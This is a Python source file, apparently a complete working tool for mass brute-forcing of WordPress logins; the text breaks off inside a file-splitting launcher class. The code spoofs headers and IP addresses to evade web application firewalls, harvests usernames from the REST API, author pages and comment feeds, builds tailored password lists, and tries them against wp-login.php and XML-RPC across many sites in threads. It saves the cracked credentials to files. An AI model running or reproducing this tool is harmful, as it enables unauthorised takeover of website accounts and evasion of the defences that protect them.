#!/usr/bin/env python3
"""
MASS POWERFULL BRUTEFORCE WORDPRESS - PRO ULTRA ADVANCED V2
Multi-CMD Support + WAF Bypass + Auto Split + Ultra Fast
"""
import requests
import concurrent.futures
import re
import json
import time
import random
import sys
import os
import threading
import itertools
import subprocess
import shutil
from urllib.parse import urlparse
from colorama import init, Fore, Style
from datetime import datetime
import hashlib
import ssl
import urllib3
# Disable warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
# ==============================================================================
# PRO WAF BYPASS & ANTI-BLOCK ENGINE
# ==============================================================================
class ProWAFBypass:
"""Engine untuk bypass WAF dan anti-block"""
def __init__(self):
self.user_agents = [
# Chrome
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
# Firefox
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0',
'Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0',
# Safari
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15',
'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
# Edge
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0',
# Opera
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0.0',
# Mobile
'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
'Mozilla/5.0 (Linux; Android 14; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36'
]
self.referers = [
'https://www.google.com/',
'https://www.bing.com/',
'https://www.yahoo.com/',
'https://www.facebook.com/',
'https://twitter.com/',
'https://www.linkedin.com/',
'https://www.reddit.com/',
'https://www.wordpress.org/',
'https://wpastra.com/',
'https://elementor.com/'
]
self.accept_languages = [
'en-US,en;q=0.9',
'id-ID,id;q=0.9,en;q=0.8',
'es-ES,es;q=0.9',
'fr-FR,fr;q=0.9',
'de-DE,de;q=0.9',
'ja-JP,ja;q=0.9',
'ko-KR,ko;q=0.9',
'zh-CN,zh;q=0.9',
'ru-RU,ru;q=0.9',
'ar-SA,ar;q=0.9'
]
self.delays = [0.1, 0.2, 0.3, 0.5, 0.7, 1.0, 1.5, 2.0]
def get_random_headers(self, include_referer=True):
"""Generate random headers untuk bypass WAF"""
headers = {
'User-Agent': random.choice(self.user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Language': random.choice(self.accept_languages),
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'DNT': '1' if random.random() > 0.5 else '0'
}
if include_referer and random.random() > 0.3:
headers['Referer'] = random.choice(self.referers)
if random.random() > 0.5:
headers['X-Requested-With'] = 'XMLHttpRequest'
return headers
def get_login_headers(self):
"""Headers khusus untuk login"""
headers = self.get_random_headers()
headers.update({
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'https://wordpress.org'
})
return headers
def get_xmlrpc_headers(self):
"""Headers khusus untuk XML-RPC"""
headers = self.get_random_headers()
headers.update({
'Content-Type': 'text/xml',
'X-Forwarded-For': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}'
})
return headers
def smart_delay(self):
"""Delay cerdas untuk menghindari rate limiting"""
time.sleep(random.choice(self.delays))
def rotate_ip_headers(self, headers):
"""Rotate IP-related headers"""
ip_headers = {
'X-Forwarded-For': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'X-Real-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'X-Client-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'X-Originating-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'CF-Connecting-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'True-Client-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}'
}
# Add 1-3 random IP headers
selected_headers = random.sample(list(ip_headers.keys()), random.randint(1, 3))
for header in selected_headers:
headers[header] = ip_headers[header]
return headers
# ==============================================================================
# PRO MULTI-LANGUAGE VALIDATION ENGINE - ENHANCED
# ==============================================================================
class ProMultiLanguageValidator:
"""Validator dengan ENHANCED indicators untuk ZERO FALSE POSITIVE"""
ERROR_INDICATORS = {
'english': [
'invalid username', 'incorrect password', 'lost your password',
'username is not registered', 'error logging in', 'login failed',
'wrong password', 'the username', 'is not registered',
'cookies are blocked', 'login error', 'try again',
'the password you entered for the username', 'is incorrect',
'please try again', 'error', 'failed to log in',
'username or password is incorrect', 'authentication failed',
'access denied', 'login attempt failed', 'too many failed attempts',
'you have exceeded the login limit', 'security check failed',
'captcha verification failed', 'two-factor authentication required',
'verification code required', 'session expired', 'cookie problem',
'blocked', '403 forbidden', '401 unauthorized', 'rate limit exceeded',
'your ip has been blocked', 'please wait', 'try again later'
],
'indonesian': [
'nama pengguna', 'tidak terdaftar', 'kata sandi salah',
'gagal login', 'lupa kata sandi', 'kesalahan', 'coba lagi',
'pengguna tidak ditemukan', 'salah kata sandi', 'login gagal',
'gagal masuk', 'kesalahan login', 'kuki diblokir',
'terlalu banyak percobaan gagal', 'keamanan gagal',
'captcha tidak valid', 'verifikasi diperlukan', 'diblokir',
'ip anda diblokir', 'silahkan tunggu', 'coba lagi nanti'
],
'spanish': [
'nombre de usuario', 'no está registrado', 'contraseña incorrecta',
'error de inicio', 'inicio de sesión falló', 'olvidaste tu contraseña',
'usuario no válido', 'contraseña inválida', 'falló el acceso',
'demasiados intentos fallidos', 'verificación de seguridad fallida',
'bloqueado', 'ip bloqueada'
],
# Tambahkan semua bahasa lainnya...
}
# Enhanced success indicators
SUCCESS_INDICATORS = {
'admin_urls': [
'/wp-admin/index.php', '/wp-admin/admin.php', '/wp-admin/profile.php',
'/wp-admin/edit.php', '/wp-admin/plugins.php', '/wp-admin/users.php',
'/wp-admin/tools.php', '/wp-admin/options-general.php', '/wp-admin/upload.php',
'/wp-admin/themes.php', '/wp-admin/widgets.php', '/wp-admin/nav-menus.php',
'/wp-admin/update-core.php', '/wp-admin/site-health.php',
'/wp-admin/admin-ajax.php', '/wp-admin/media-new.php'
],
'admin_content': [
'wp-admin-bar', 'adminmenu', 'screen-meta', 'wp-responsive-open',
'wp-heading-inline', 'wp-list-table', 'wp-core-ui', 'wp-not-current-submenu',
'dashicons-before', 'wp-menu-image', 'admin-color-schemes',
'postbox', 'meta-box-sortables', 'wp-editor-container',
'quicktags-toolbar', 'wp-media-buttons', 'wp-uploader',
'media-frame-router', 'media-modal', 'wp-dialog',
'current', 'wp-submenu', 'folded', 'wp-has-submenu',
'admin_page', 'dashboard-widgets', 'welcome-panel'
],
'dashboard_elements': [
'welcome-panel', 'dashboard-widgets-wrap', 'dashboard_right_now',
'dashboard_activity', 'dashboard_quick_press', 'dashboard_primary',
'browser-nag', 'dashboard-widgets', 'dashboard_site_health',
'at-a-glance', 'activity-widget', 'wordpress-news'
]
}
@staticmethod
def is_wp_admin_page(url, content, cookies, session):
"""Enhanced admin page detection"""
url_lower = url.lower()
content_lower = content.lower()
# Check jika URL mengandung wp-admin
if 'wp-admin' not in url_lower:
return False, "Not admin URL"
# Check cookies WordPress
cookie_str = str(cookies)
if 'wordpress_logged_in' not in cookie_str and 'wordpress_sec' not in cookie_str:
return False, "No WordPress auth cookies"
# Check content indicators dengan skor
score = 0
# Check admin URLs
for admin_url in ProMultiLanguageValidator.SUCCESS_INDICATORS['admin_urls']:
if admin_url in url_lower:
score += 2
break
# Check admin content
for category, indicators in ProMultiLanguageValidator.SUCCESS_INDICATORS.items():
if category == 'admin_urls':
continue
for indicator in indicators:
if indicator.lower() in content_lower:
score += 1
break
# Check untuk redirect loops
if 'wp-login.php' in url_lower and score < 3:
return False, "Redirect loop detected"
return score >= 3, f"Admin page score: {score}"
@staticmethod
def validate_xmlrpc_response(response_text):
"""Enhanced XML-RPC validation"""
text_lower = response_text.lower()
# Check untuk FAULT dengan berbagai pola
fault_patterns = [
'faultcode', '<fault>', 'faultstring',
'403 forbidden', '401 unauthorized', 'parse error',
'xml parse error', 'method not found', 'incorrect',
'invalid', 'wrong', 'error', 'failed', 'unauthorized',
'forbidden', 'access denied', 'authentication failed'
]
for pattern in fault_patterns:
if pattern in text_lower:
return False, f"XML-RPC fault: {pattern}"
# Check untuk SUCCESS dengan skor
success_patterns = [
'member><name>blogname</name>',
'member><name>isadmin</name>',
'member><name>userid</name>',
'member><name>url</name>',
'member><name>xmlrpc</name>',
'value><array><data>',
'string>wordpress</string>',
'string>admin</string>',
'methodresponse>',
'array><data>',
'struct>'
]
success_score = sum(1 for pattern in success_patterns if pattern in text_lower)
# Check structure XML yang valid
if '<methodresponse>' in text_lower and '</methodresponse>' in text_lower:
success_score += 2
return success_score >= 3, f"XML-RPC success score: {success_score}"
# ==============================================================================
# PRO SMART WORDLIST GENERATOR - ALL METHODS
# ==============================================================================
class ProSmartWordlistGenerator:
"""Wordlist generator dengan SEMUA METHOD + ENHANCED"""
def __init__(self, username, domain):
self.username = username
self.domain = domain
self.domain_name = self._extract_domain_name()
self.current_year = str(datetime.now().year)
self.last_year = str(int(self.current_year) - 1)
self.next_year = str(int(self.current_year) + 1)
def _extract_domain_name(self):
"""Extract clean domain name"""
try:
parsed = urlparse(self.domain)
if parsed.netloc:
domain = parsed.netloc.replace('www.', '')
parts = domain.split('.')
if len(parts) > 1:
return parts[0]
return domain
except:
pass
return 'site'
def generate_all_methods_enhanced(self):
"""Generate passwords dengan SEMUA METHOD ENHANCED"""
all_passwords = set()
# METHOD 1: DEFAULT PASSWORDS (Enhanced)
passwords = [
'admin', 'password', '123456', 'admin123', 'password123',
'Admin123', 'admin@123', 'Password123', 'P@ssw0rd', '12345678',
'test', 'demo', '1234567890', 'qwerty', 'abc123', '111111',
'welcome', 'monkey', 'dragon', 'letmein', 'sunshine',
'master', 'hello', 'freedom', 'whatever', 'qazwsx',
'trustno1', '654321', 'jordan23', 'harley', 'mustang',
'superman', 'michael', 'matrix', 'football', 'jennifer',
'hunter', 'joshua', 'george', 'matthew', 'michelle',
'andrew', 'charlie', 'access', 'shadow', 'baseball',
'donald', 'william', 'ashley', 'daniel', 'master123',
'mypass', 'mypassword', 'login', 'princess', 'jordan',
'tigger', 'soccer', 'harley1', 'hockey', 'iloveyou',
'smokey', 'gateway', 'bailey', 'passw0rd', 'yellow',
'cookie', 'adminadmin', 'administrator', 'changeme',
'123123', 'qwerty123', '1q2w3e4r', '1qaz2wsx', 'zaq12wsx',
'!qaz2wsx', '1qaz!QAZ', '!QAZ2wsx', 'P@ssw0rd!',
'Admin@123', 'Admin#123', 'Admin$123', 'Admin%123',
'Pass@123', 'Pass#123', 'Pass$123', 'Pass%123',
'Welcome@123', 'Welcome#123', 'Welcome$123', 'Welcome%123',
'wordpress', 'wpadmin', 'wp@123', 'wp#123', 'wp$123',
'wp%123', 'wproot', 'wp_admin', 'wp123', 'wp@dmin',
'wordpress123', 'wp@123456', 'wp#2024', 'wp$admin',
'administrator123', 'editor123', 'author123', 'contributor123',
# WordPress specific
'wp_password', 'wp_pass', 'wp123456', 'wp@2024',
'wordpress@123', 'wpadmin123', 'wp_admin123',
'admin_wordpress', 'wp_admin2024'
]
all_passwords.update(passwords)
# METHOD 2: KEYBOARD_PATTERNS-SPECIAL_CHARS
keyboard_special = [
'qwerty!@#', 'asdfgh!@#', 'zxcvbn!@#', '!@#qwerty',
'!qaz@wsx', '@wsx#edc', '#edc$rfv', '$rfv%tgb',
'1qaz!QAZ', '2wsx@WSX', '3edc#EDC', '4rfv$RFV',
'qwer1234!', 'asdf1234@', 'zxcv1234#', '1234qwer$',
'!@#$qwerty', 'qwerty!@#$', 'asdfgh@#$%', '@#$%asdfgh',
'zaq!@wsx', 'xsw@!zaq', '!qaz2wsx', '2wsx#EDC',
'qwe!@#123', 'asd@#$123', 'zxc#$%123', '123!@#qwe'
]
all_passwords.update(keyboard_special)
# METHOD 3: LEETSPEAK-COUNTRY_SPECIFIC-DOMAIN_BASED
leet_map = {'a': '4', 'e': '3', 'i': '1', 'o': '0', 's': '5', 't': '7'}
countries = ['usa', 'uk', 'id', 'in', 'au', 'ca', 'de', 'fr', 'jp', 'kr', 'cn', 'ru', 'br', 'mx']
leet_user = self.username
for char, replacement in leet_map.items():
if char in leet_user:
leet_user = leet_user.replace(char, replacement)
leet_domain = self.domain_name
for char, replacement in leet_map.items():
if char in leet_domain:
leet_domain = leet_domain.replace(char, replacement)
for country in countries[:5]:
all_passwords.add(f"{leet_user}{country}{leet_domain}")
all_passwords.add(f"{country}{leet_user}{leet_domain}")
all_passwords.add(f"{leet_domain}{country}{leet_user}")
all_passwords.add(f"{leet_user}{country}{self.current_year}")
all_passwords.add(f"{country}{self.current_year}{leet_user}")
# METHOD 4: LEETSPEAK-DATE_BASED-DOMAIN_BASED
for year in [self.current_year, self.last_year]:
all_passwords.add(f"{leet_user}{year}{leet_domain}")
all_passwords.add(f"{year}{leet_user}{leet_domain}")
all_passwords.add(f"{leet_domain}{year}{leet_user}")
all_passwords.add(f"{leet_user}{year[:2]}{leet_domain}")
all_passwords.add(f"{year}{leet_domain}{leet_user}")
# METHOD 5: LEETSPEAK-DOMAIN_BASED-SPECIAL_CHARS
specials = ['!', '@', '#', '$', '%', '&', '*']
for spec in specials:
all_passwords.add(f"{leet_user}{leet_domain}{spec}")
all_passwords.add(f"{spec}{leet_user}{leet_domain}")
all_passwords.add(f"{leet_user}{spec}{leet_domain}")
all_passwords.add(f"{leet_domain}{spec}{leet_user}")
all_passwords.add(f"{leet_user}{leet_domain}{spec}{spec}")
# METHOD 6: LEETSPEAK-KEYBOARD_PATTERNS-REVERSE
keyboard = ['qwerty', 'asdfgh', 'zxcvbn', '123qwe', '1qaz2wsx']
rev_user = self.username[::-1]
for kb in keyboard:
all_passwords.add(f"{leet_user}{kb}")
all_passwords.add(f"{kb}{leet_user}")
all_passwords.add(f"{rev_user}{kb}")
all_passwords.add(f"{kb}{rev_user}")
all_passwords.add(f"{leet_user}{kb}{rev_user}")
all_passwords.add(f"{rev_user}{kb}{leet_user}")
# METHOD 7: NUMBER_SEQUENCES-EMAIL_BASED-REVERSE
sequences = ['123', '1234', self.current_year]
email_domains = ['@gmail.com', '@yahoo.com', f'@{self.domain_name}.com']
rev_domain = self.domain_name[::-1]
for seq in sequences:
for email in email_domains:
all_passwords.add(f"{self.username}{seq}{email}")
all_passwords.add(f"{seq}{self.username}{email}")
all_passwords.add(f"{rev_user}{seq}{email}")
all_passwords.add(f"{seq}{rev_user}{email}")
all_passwords.add(f"{self.domain_name}{seq}{email}")
all_passwords.add(f"{rev_domain}{seq}{email}")
# METHOD 8: ORGANIZATION_BASED-DOMAIN_BASED
org_words = ['admin', 'administrator', 'webmaster', 'sysadmin', 'root',
'manager', 'editor', 'author', 'user', 'staff']
for org in org_words:
all_passwords.add(f"{org}{self.domain_name}")
all_passwords.add(f"{self.domain_name}{org}")
all_passwords.add(f"{org}_{self.domain_name}")
all_passwords.add(f"{self.domain_name}_{org}")
all_passwords.add(f"{org}{self.domain_name}{self.current_year}")
all_passwords.add(f"{self.current_year}{org}{self.domain_name}")
# METHOD 9: REVERSE_PATTERNS-LEETSPEAK-DATE_BASED
for year in [self.current_year, self.last_year]:
all_passwords.add(f"{rev_user}{leet_user}{year}")
all_passwords.add(f"{year}{rev_user}{leet_user}")
all_passwords.add(f"{leet_user}{year}{rev_user}")
all_passwords.add(f"{rev_user}{year}{leet_user}")
all_passwords.add(f"{year[:2]}{rev_user}{leet_user}")
# METHOD 10: SEASONAL_PATTERNS-KEYBOARD_PATTERNS
seasons = ['spring', 'summer', 'autumn', 'winter']
for season in seasons:
for kb in ['qwerty', 'asdfgh']:
all_passwords.add(f"{season}{kb}")
all_passwords.add(f"{kb}{season}")
all_passwords.add(f"{season}{kb}123")
all_passwords.add(f"123{kb}{season}")
# METHOD 11: SEASONAL_PATTERNS-SPECIAL_CHARS
for season in seasons:
for spec in ['!', '@', '#']:
all_passwords.add(f"{season}{spec}")
all_passwords.add(f"{spec}{season}")
all_passwords.add(f"{season}{self.current_year}{spec}")
all_passwords.add(f"{spec}{self.current_year}{season}")
# METHOD 12: SPECIAL_CHARS-DOMAIN_BASED-SEASONAL
for season in seasons:
for spec in ['!', '@', '#']:
all_passwords.add(f"{spec}{self.domain_name}{season}")
all_passwords.add(f"{season}{self.domain_name}{spec}")
all_passwords.add(f"{self.domain_name}{spec}{season}")
all_passwords.add(f"{season}{spec}{self.domain_name}")
# METHOD 13: SPECIAL_CHARS-ORGANIZATION_BASED
for org in org_words[:5]:
for spec in ['!', '@', '#', '$']:
all_passwords.add(f"{org}{spec}")
all_passwords.add(f"{spec}{org}")
all_passwords.add(f"{org}{spec}{self.current_year}")
all_passwords.add(f"{self.current_year}{spec}{org}")
# METHOD 14: SPECIAL_CHARS-USERNAME_BASED-EMAIL
for spec in ['!', '@', '#']:
all_passwords.add(f"{self.username}{spec}@gmail.com")
all_passwords.add(f"{spec}{self.username}@gmail.com")
all_passwords.add(f"{self.username}@{self.domain_name}.com{spec}")
all_passwords.add(f"{spec}{self.username}@{self.domain_name}.com")
# METHOD 15: SPECIAL_CHARS-USERNAME_BASED-REVERSE
for spec in ['!', '@', '#']:
all_passwords.add(f"{self.username}{spec}{rev_user}")
all_passwords.add(f"{spec}{self.username}{rev_user}")
all_passwords.add(f"{rev_user}{spec}{self.username}")
all_passwords.add(f"{self.username}{rev_user}{spec}")
# METHOD 16: USERNAME_BASED-KEYBOARD_PATTERNS-1
for kb in ['qwerty', 'asdfgh', 'zxcvbn']:
all_passwords.add(f"{self.username}{kb}")
all_passwords.add(f"{kb}{self.username}")
all_passwords.add(f"{self.username}{kb}123")
all_passwords.add(f"{kb}123{self.username}")
# METHOD 17: USERNAME_BASED-KEYBOARD_PATTERNS-2
for kb in ['123qwe', '1qaz2wsx', 'zaq12wsx']:
all_passwords.add(f"{self.username}{kb}")
all_passwords.add(f"{kb}{self.username}")
all_passwords.add(f"{self.username}{kb}{self.current_year[-2:]}")
all_passwords.add(f"{kb}{self.current_year[-2:]}{self.username}")
# METHOD 18: USERNAME_BASED-NUMBER_SEQUENCES
sequences = ['123', '1234', '12345', '123456', '111', '222', '333', '444', '555']
for seq in sequences:
all_passwords.add(f"{self.username}{seq}")
all_passwords.add(f"{seq}{self.username}")
all_passwords.add(f"{self.username.upper()}{seq}")
all_passwords.add(f"{seq}{self.username.upper()}")
all_passwords.add(f"{self.username.lower()}{seq}")
all_passwords.add(f"{seq}{self.username.lower()}")
# METHOD 19: USERNAME_BASED-ORGANIZATION_BASED
for org in org_words:
all_passwords.add(f"{self.username}{org}")
all_passwords.add(f"{org}{self.username}")
all_passwords.add(f"{self.username}_{org}")
all_passwords.add(f"{org}_{self.username}")
all_passwords.add(f"{self.username}{org}{self.current_year[-2:]}")
all_passwords.add(f"{org}{self.current_year[-2:]}{self.username}")
# METHOD 20: USERNAME_BASED-SPECIAL_CHARS-DATE
for spec in ['!', '@', '#', '$']:
for year in [self.current_year, self.last_year]:
all_passwords.add(f"{self.username}{spec}{year}")
all_passwords.add(f"{year}{spec}{self.username}")
all_passwords.add(f"{spec}{self.username}{year}")
all_passwords.add(f"{self.username}{year}{spec}")
# Convert to list, shuffle, dan limit
final_list = list(all_passwords)
random.shuffle(final_list)
return final_list[:1000] # Limit to 1000 passwords
# ==============================================================================
# PRO WORDPRESS ATTACK ENGINE - ENHANCED
# ==============================================================================
class ProWordPressAttackEnhanced:
def __init__(self, thread_id=1, part_file=None):
self.thread_id = thread_id
self.part_file = part_file
self.successful_logins = []
self.lock = threading.Lock()
self.validator = ProMultiLanguageValidator()
self.waf_bypass = ProWAFBypass()
self.session = None
self.timeout = 15
self.max_retries = 3
self.results_file = f"results_part{thread_id}.txt" if part_file else "results.txt"
def create_session(self):
"""Create session dengan WAF bypass"""
session = requests.Session()
session.verify = False
session.headers.update(self.waf_bypass.get_random_headers())
session.timeout = self.timeout
return session
def detect_wordpress_enhanced(self, url):
"""Deteksi WordPress dengan multiple checks"""
try:
session = self.create_session()
checks = []
# Check 1: wp-login.php
try:
resp = session.get(f"{url}/wp-login.php", timeout=5)
if resp.status_code == 200:
content = resp.text.lower()
login_indicators = [
'wp-submit' in content,
'password' in content,
'username' in content or 'log' in content,
'testcookie' in content or 'rememberme' in content,
'wp-content' in content or 'wp-includes' in content
]
if sum(login_indicators) >= 3:
checks.append(('login_page', True))
else:
checks.append(('login_page', False))
except:
checks.append(('login_page', False))
# Check 2: REST API
try:
resp = session.get(f"{url}/wp-json/wp/v2/", timeout=3)
if resp.status_code == 200 and 'wordpress' in resp.text.lower():
checks.append(('rest_api', True))
else:
checks.append(('rest_api', False))
except:
checks.append(('rest_api', False))
# Check 3: Generator meta
try:
resp = session.get(url, timeout=3)
if 'generator" content="wordpress' in resp.text.lower():
checks.append(('generator', True))
else:
checks.append(('generator', False))
except:
checks.append(('generator', False))
# Check 4: Readme
try:
resp = session.get(f"{url}/readme.html", timeout=3)
if resp.status_code == 200 and 'wordpress' in resp.text.lower():
checks.append(('readme', True))
else:
checks.append(('readme', False))
except:
checks.append(('readme', False))
# Check 5: wp-admin
try:
resp = session.get(f"{url}/wp-admin/", timeout=3)
if resp.status_code in [200, 301, 302, 401, 403]:
checks.append(('wp_admin', True))
else:
checks.append(('wp_admin', False))
except:
checks.append(('wp_admin', False))
# Evaluate checks
true_checks = sum(1 for _, result in checks if result)
return true_checks >= 2
except:
return False
def get_usernames_enhanced(self, url):
"""Get usernames dengan multiple methods"""
usernames = set()
session = self.create_session()
# Method 1: REST API
try:
resp = session.get(f"{url}/wp-json/wp/v2/users", timeout=5)
if resp.status_code == 200:
users = resp.json()
for user in users:
if 'slug' in user:
usernames.add(user['slug'])
except:
pass
# Method 2: Author pages
for i in range(1, 6):
try:
resp = session.head(f"{url}/?author={i}", allow_redirects=True, timeout=3)
final_url = resp.url
if 'author/' in final_url:
username = final_url.split('author/')[1].split('/')[0]
usernames.add(username)
except:
continue
# Method 3: Comments feed
try:
resp = session.get(f"{url}/comments/feed/", timeout=5)
if resp.status_code == 200:
matches = re.findall(r'<dc:creator><!\[CDATA\[(.*?)\]\]></dc:creator>', resp.text)
usernames.update(matches)
except:
pass
# If no usernames found, use defaults
if not usernames:
usernames = {'admin', 'administrator', 'editor'}
return list(usernames)
def check_xmlrpc(self, url):
"""Check if XML-RPC is working"""
try:
test_payload = '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName></methodCall>'
headers = self.waf_bypass.get_xmlrpc_headers()
session = self.create_session()
session.headers.update(headers)
resp = session.post(f"{url}/xmlrpc.php", data=test_payload, timeout=5)
if resp.status_code == 200 and 'methodResponse' in resp.text:
return True
return False
except:
return False
def attack_site(self, site):
"""Main attack function"""
url = site.strip()
if not url.startswith(('http://', 'https://')):
url = 'https://' + url
print(f"\n{Fore.CYAN}[THREAD-{self.thread_id}]{Style.RESET_ALL} Processing: {url}")
try:
# Check WordPress
if not self.detect_wordpress_enhanced(url):
print(f"{Fore.YELLOW}[SKIP]{Style.RESET_ALL} Not WordPress or inaccessible")
return None
print(f"{Fore.GREEN}[✓]{Style.RESET_ALL} WordPress detected")
# Get usernames
usernames = self.get_usernames_enhanced(url)
print(f"{Fore.GREEN}[USERS]{Style.RESET_ALL} Found: {usernames}")
# Check XML-RPC
xmlrpc_working = self.check_xmlrpc(url)
if xmlrpc_working:
print(f"{Fore.GREEN}[XML-RPC]{Style.RESET_ALL} Working")
else:
print(f"{Fore.YELLOW}[XML-RPC]{Style.RESET_ALL} Not available")
# Generate wordlists
all_passwords = []
for username in usernames[:2]: # Max 2 usernames
generator = ProSmartWordlistGenerator(username, url)
passwords = generator.generate_all_methods_enhanced()
all_passwords.extend(passwords)
# Remove duplicates and shuffle
all_passwords = list(dict.fromkeys(all_passwords))
random.shuffle(all_passwords)
# Limit based on method
if xmlrpc_working:
all_passwords = all_passwords[:300]
else:
all_passwords = all_passwords[:100]
print(f"{Fore.GREEN}[PASSWORDS]{Style.RESET_ALL} {len(all_passwords)} to test")
# Start attack
success = self.brute_force_attack(url, usernames[:2], all_passwords, xmlrpc_working)
if success:
return success
else:
print(f"{Fore.RED}[FAILED]{Style.RESET_ALL} No valid credentials")
return None
except KeyboardInterrupt:
raise
except Exception as e:
print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} {str(e)[:100]}")
return None
def brute_force_attack(self, url, usernames, passwords, xmlrpc_working):
"""Brute force dengan WAF bypass"""
attempts = 0
max_attempts = len(passwords) * len(usernames)
for username in usernames:
for password in passwords:
attempts += 1
# Progress display
if attempts % 5 == 0:
progress = (attempts / max_attempts) * 100
sys.stdout.write(f"\r{Fore.WHITE}[PROGRESS]{Style.RESET_ALL} {attempts}/{max_attempts} ({progress:.1f}%) | {username}:{password[:15]:<15}")
sys.stdout.flush()
try:
if xmlrpc_working:
success, message = self.attack_xmlrpc_enhanced(url, username, password)
else:
success, message = self.attack_wplogin_enhanced(url, username, password)
if success:
print(f"\n{Fore.GREEN}[SUCCESS]{Style.RESET_ALL} {username}:{password}")
print(f"{Fore.GREEN}[METHOD]{Style.RESET_ALL} {message}")
# Final verification
if self.final_verification_enhanced(url, username, password):
result = {
'url': url,
'username': username,
'password': password,
'method': message,
'thread': self.thread_id
}
self.save_result(result)
return result
else:
print(f"{Fore.YELLOW}[FALSE]{Style.RESET_ALL} Failed verification")
continue
except KeyboardInterrupt:
raise
except:
continue
# Smart delay
self.waf_bypass.smart_delay()
return None
def attack_wplogin_enhanced(self, url, username, password):
"""WP-Login attack dengan WAF bypass"""
session = self.create_session()
try:
# Get login page dengan random headers
session.headers.update(self.waf_bypass.get_login_headers())
resp = session.get(f"{url}/wp-login.php", timeout=10)
if resp.status_code != 200:
return False, "Cannot access login"
# Submit login
data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'redirect_to': f"{url}/wp-admin/",
'testcookie': '1',
'rememberme': 'forever'
}
# Add random delay
time.sleep(random.uniform(0.5, 1.5))
login_resp = session.post(f"{url}/wp-login.php", data=data,
timeout=15, allow_redirects=True)
# Validate response
if login_resp.status_code == 200:
# Check if still on login page
if 'wp-login.php' in login_resp.url:
return False, "Still on login page"
# Check for admin access
if 'wp-admin' in login_resp.url or 'dashboard' in login_resp.url:
# Check cookies
cookies = session.cookies.get_dict()
if any('wordpress_logged_in' in k for k in cookies.keys()):
return True, "WP-Login success with cookies"
return False, "Login failed"
except Exception as e:
return False, f"Error: {str(e)[:50]}"
def attack_xmlrpc_enhanced(self, url, username, password):
"""XML-RPC attack dengan WAF bypass"""
session = self.create_session()
try:
xml_data = f"""<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>{username}</string></value></param>
<param><value><string>{password}</string></value></param>
</params>
</methodCall>"""
headers = self.waf_bypass.get_xmlrpc_headers()
session.headers.update(headers)
# Add random delay
time.sleep(random.uniform(0.3, 1.0))
resp = session.post(f"{url}/xmlrpc.php", data=xml_data, timeout=10)
if resp.status_code == 200:
# Check response
if 'fault' not in resp.text.lower():
if 'isadmin' in resp.text.lower() or 'blogname' in resp.text.lower():
return True, "XML-RPC success"
return False, "XML-RPC failed"
except Exception as e:
return False, f"Error: {str(e)[:50]}"
def final_verification_enhanced(self, url, username, password):
"""Final verification dengan multiple methods"""
# Try both methods
success1, _ = self.attack_wplogin_enhanced(url, username, password)
success2, _ = self.attack_xmlrpc_enhanced(url, username, password)
return success1 or success2
def save_result(self, result):
"""Save result to thread-specific file"""
with open(self.results_file, 'a', encoding='utf-8') as f:
f.write(f"{result['url']}|{result['username']}|{result['password']}|{result['method']}|{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
print(f"{Fore.GREEN}[SAVED]{Style.RESET_ALL} Result saved to {self.results_file}")
# ==============================================================================
# MULTI-CMD SPLITTER & LAUNCHER
# ==============================================================================
class MultiCmdLauncher:
"""Split file dan launch multiple CMD"""
def __init__(self, input_file, num_parts=4):
self.input_file = input_file
self.num_parts = num_parts
self.part_files = []
def split_file(self):
